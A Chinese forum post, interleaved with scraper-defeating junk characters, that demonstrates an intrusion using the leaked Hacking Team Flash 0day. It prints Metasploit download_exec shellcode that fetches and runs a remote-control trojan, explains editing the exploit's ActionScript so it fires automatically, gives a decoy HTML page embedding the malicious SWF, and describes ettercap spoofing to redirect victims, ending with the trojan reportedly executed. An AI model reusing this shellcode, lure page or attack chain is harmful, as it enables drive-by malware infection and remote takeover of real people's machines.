flash 0day之手工代码修改制作下载者实例入侵演示

admin · 发表于 2018-10-20 20:28:55

K/ W/ i w' U" B6 |, } 三、flash 0day之手工代码修改制作下载者实例入侵演示 " T) P% P( P0 U }

1 i, C- F/ C2 T: X 利用到的工具： / w, P+ \) W8 }) z

$ X1 a2 X4 o: O/ g/ d1 g Msf 4 h U$ I! L# v! f' H

" U7 m6 y% T# ^: O7 W Ettercap 1 ~; a1 h6 q, a4 S+ O. v; w

6 w" x; \; P! N, W b# U! Q& v Adobe Flash CS6 1 _9 {1 |( Y r/ S4 m% F$ f7 e

, F h- \5 L# _7 \8 H' H1 b Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 : S( ]6 t I% i4 E3 l8 U& ]9 y

. U1 I6 i* K% i5 }7 b$ w: R8 h 下面我们就开始演示入侵，利用msf生成shellcode,首先打开msf执行use windows/download_exec，show options + v" ]2 [7 L8 \; O

7 d* H' K8 g9 A- P 如图： 6 I( a+ q( p- U f- b

4 A$ i9 p$ g; [9 v# i1 ^( w% t' D " r) n9 _ T0 m. _7 l* u

1 a A6 e" z. |! i; e, z- n5 c ( t8 N0 a( |# B) a6 d* m) J1 ]

' x3 c% w( L7 X7 K: ~ 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址，这里我们用远控马，远控配置使用不再详细说明。。。如图: 9 n7 r3 `4 q+ o+ {2 W) U, }

2 j# }* k& ]; z j. k / ~/ k- }0 [ G3 \5 H$ D

+ J I( ~' h" g; q6 ? 5 r9 O& m# X, s1 u6 ]* b. o

4 `* ?; _4 @# s% @; G! U8 V 然后执行generate -t dword生成shellcode，如下： ) q* Z3 X, U P9 a3 Y2 ]

5 c8 `, x' a4 }( i) S) T o / g0 a6 ]! y5 {

# ~# r, e5 ^( e3 X 复制代码到文本下便于我们一会编辑flash exp，如下： 9 |, w! a* ]/ E* Z4 S0 I& \

8 y \( @! S% z' y9 b P 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 6 ?4 u5 G+ r- G9 r# G

$ ]& \4 @) a) t/ q4 _1 K4 t9 f 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, - o5 `. d1 J1 t' E' d; u

8 z! s( J, Y) t+ }. P 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 1 O: Y0 S9 N; X, s3 ?

" n) ^% }7 j( |; T' i! T 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 1 L. {! Z2 F; m& f6 T5 ]/ ^; J

( _: |3 B5 t: {( ] 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, , v4 z- W8 V$ [" J

4 ?; u; ~! J7 ^- S: H. L/ ] 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 3 k( d7 g f. y- o+ j

9 O8 H( I& E2 v 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, . b. V- C! G6 d; p3 X

. D8 `$ G8 {4 l P5 I 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 3 ?2 n6 o9 e; i' O. a( ?2 ?

# h+ R" D# S$ R1 c% v; G) l 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, # E* d3 C! t! R' h. J

6 P+ Q2 I( H: _: t$ L1 r 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, Q' J, r# m0 k, `' |( Z& s

/ k% h/ g9 I4 |! k& @ 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, / L M& ? b+ ?2 n' r

" E( v- N& r4 h7 Z0 K 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, " g' {, s; t, \

5 x, ]" \+ x( _5 A* \- D/ t 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, - s( Z+ I# v8 C) P2 K

) _& I- E$ g' }- D/ n5 s' h 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 : K2 ~& ^ g3 a( ]2 v k

6 [+ T9 V! u3 C! k& `3 N8 X- b# n! D $ V0 z/ N0 J' ^" T7 D6 t

4 s' H5 X. W i$ K8 F * H# z2 N7 `: C" C# ]0 D& P

* a, r" I* b5 b7 N/ B' v- H 下面我们来修改flash 0day exp，需要修改三个文件，分别为： . k0 C6 e* B' a7 T _

2 B! W! }) U3 Y# M7 U9 M" S 5 x( @9 R' s% @ N

0 k2 I# G6 m: c' o% D6 D2 U 先修改ShellWin32.as，部分源代码如图： " \- ]2 J" ^; t' Y, Q) s" I, v

0 J! \; X9 M! c 5 Q+ y, ]# d1 A

- S9 z' I( }! p) j 我们需要把标记处[]中的代码改成用msf生成的代码，修改后如下： C% D% C# E- ?# \

3 x6 V# B3 H& _! v8 ^$ V $ ~6 P9 j. v Z0 f3 x% `9 t( P% k

8 o3 N; e' A3 h O/ Q 然后保存，ShellWin64.as的修改方法如上述，不再演示，下面我们来修改myclass.as,这里需要说明一下，因为此exp生成的利用程序，不能直接自动触发flash漏洞，也就是需要点击按钮才可以，实际上在做渗透的时候需要把它搞得更完美，所以就需要修改，修改方法：搜索myclass的某个字符doc.addchild(btn);如图： 5 d1 e' R6 U o, q" v2 d

! D7 A+ B2 B9 _8 g+ M M. M( R, \( B- W% @* R/ `- ~6 I9 ]

. P6 |0 z& @* P7 _- g4 k& ? 换行在后面加一句TryExpl();注意是l不是数字1，然后如图： ' r' z% \/ C0 P$ ~

0 X2 V2 C' J/ P4 o+ q6 |/ |8 c M! D$ ]7 N# Z! |9 q! U3 j

s: L; {0 s' j4 w% e/ \ 4 B0 k2 N. M1 b; E

! p9 s% n: T7 w. N) d* c 8 N' j _- L" _5 ^' l2 x

: T8 o+ e4 x. _5 N! J$ F- D5 a 然后点保存，下面我们来编译一下，打开 0 R* o4 w4 T# p8 _$ B& S( }

% {7 u5 Z* P! n; h1 B- I exp1.fla然后点文件-发布，看看编译没错误 ) d$ O' ~& z* y/ |/ k. x+ H( ?1 q

2 a% O' S( U- y 0 d7 h( A, N" W

# {- H" b. @9 w3 I' G- G 3 i- t- V6 ]# f7 Q

' c# s) r% c2 G* g! A! u6 { * X( o X% O, R

j9 Z0 \- d( k; o4 Z: }2 f , D, W" s2 ~' c" ?$ ?$ }

) J$ H. B5 P& Q8 h 然后我们把生成的 1 }- e% f6 N+ U+ J/ p4 f% W

* o9 {5 N( ? N" e exp1.swf丢到kailinux 的/var/www/html下： 7 D" D8 |/ Z# ^0 b3 |

0 V! I$ G9 F1 [" @5 o* _0 E 然后把这段代码好好编辑一下 $ Q R% C; B- ^7 P9 a

) R Q4 c6 b. L# a- u- H& O / D2 o0 R, K4 ^: J. P

0 |* B& N9 n6 v, {& l- w/ X 8 u" m$ a7 Q6 [9 s/ s' U

9 f) W/ ?0 u. G' ^) j1 Z- w , {1 ^ U) E3 W- `: S9 H' t

3 `4 S, x1 G1 N H9 g$ E8 P* k$ ? % D2 ^' r! ^9 _6 A

9 ]# J+ d M% A- H( A$ S 2 e8 M3 M$ U8 d

. ^3 {9 D% _& U, ? u' I) M1 f0 \6 Z4 V/ c2 z: x5 B. q

1 x* P, l5 w. o2 A n <!DOCTYPE html> - d% ~: @& b+ w

3 J9 ^$ V- J3 l$ Y: K; P& h9 C <html> 1 { x+ G' w6 c

+ s: w5 [& H2 g* A; | <head> * w% V0 o% Z* f1 z

% E7 X" a3 U/ Z; O <meta http-equiv="Content-Type" content="text/html; % \2 t: I! b, v/ d

0 n& \* |0 i, a, O9 S j: D, D charset=utf-8"/> ( {( E( s& K; ~2 M9 z3 G% p' r

% z. |# I- ?! A2 H( a </head> . r" ]: |" \; {( h, H

) G: {+ S9 g0 V6 @& w+ ^ <body> " V/ A7 |# d, R( a& h4 x+ q

z* V9 H' |; R* P4 V- q7 Z <h2> Please wait, the requested page is loading...</h2> 6 `4 w2 u! B3 h& h

+ h2 ~( h4 k, E <br> ! b1 E! [9 ~6 m# ?- B

( h" a- B6 Z I$ u <OBJECT * K6 G) Z6 m3 f7 o* I% r

- j# t% q* H. Q! C classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 6 j, ?3 s3 w- g, }* _: F# \. ^

8 ?: y6 b' B4 B- _ VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 1 y( u5 Z: z* `. M, s1 u1 _! \: P

0 l6 y, V" Q- \- H# G9 ^ </body> * g8 ^* Z- D8 z% o6 C% N: z

/ v/ d9 n0 I3 `' c1 X8 Y <script> 9 ^, c& [/ V: c) I& _( D

* f6 ]" Y% e# u, w setTimeout(function () { - u. U! J' c: [! G

/ g, w% a' k# d& V+ B5 P* `6 F/ Z " ^4 u2 n1 m! |" ]& M

1 t8 |& ]0 P& D window.location.reload(); 0 S8 F- g" d6 H& m0 }

7 d% |6 W' Z! l6 k- ^8 J8 j }, 10000); & \7 M2 i: a! c$ g* S

2 U |9 l8 M) y) v, u7 @) r5 X+ x* O 5 F& C6 P. m; `) O

5 c! `9 T# W0 `& x </script> 4 b* L( x8 f2 }: p

8 V% [# Y- \# D2 Z: f; O3 Z3 ^& h </html> , G/ h$ ^2 A- Y8 q0 H: |! y

) n) p J; j1 v6 ]% ]3 B - l& P) x8 J( {0 Q; c

' b% G/ @4 @* H8 U( K 注意：192.168.0.109是kali的ip地址，这时候我们需要service apache2 start启动一下web服务，然后将上面的html保存为index.htm同样丢到kali web目录下，测试访问链接存在如图： ! U& [. }9 o' ~: {' p$ x

' m# F8 _: o" i6 J' ` # T2 N, i4 S- ~' x4 \9 P5 n% v" J

& G' [0 j; M% i& v+ |& s4 L( A8 N 5 C$ Z8 I1 ]0 {) D- C- j$ N- s

; ? U, V) p1 o( B! U $ G# x6 k' Q# }5 F+ U

' ~2 I2 Y, O# z( D$ \+ }: `6 a+ _ 4 w3 D% k" _" L9 C o

2 B: {. ]$ {. p; `! M) O/ y+ d8 \ 1 U7 a& B0 h( p- F& r( [

, u6 ?3 Z& ]! h5 n 下面我们用ettercap欺骗如图： 7 x- C; B4 c& c7 P; p; r$ S9 W

; n! \! a i( N" M) D$ K. i " b) Q; o2 l$ L" |. x6 _5 @

: B! I+ h- h+ u. w* H7 X# P 4 J4 y& h \: [

/ X. y6 i1 `( L6 l. ^+ w+ T3 x2 M 下面我们随便访问个网站看看： " [% o5 J4 b$ K4 L7 b! i6 D& d

- u/ a( m# h- ?, h6 p$ }. { 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功，如图： . E) _' n# b3 O% L, {+ a7 Z

5 E' b0 Z3 I" A5 k) p2 | h 8 b; n4 V) J* D

! a' I" d/ _( {6 d% i8 E) w 我们看另一台， $ p# |- _! c- U

. P% O8 J! L$ N# y/ W7 C0 R+ C 提示这个错误，说明木马是成功被下载执行了，只是由于某些原因没上线而已。。。 & s8 k- T$ ~6 \5 U. k) w" D

		自动登录	找回密码
密码			立即注册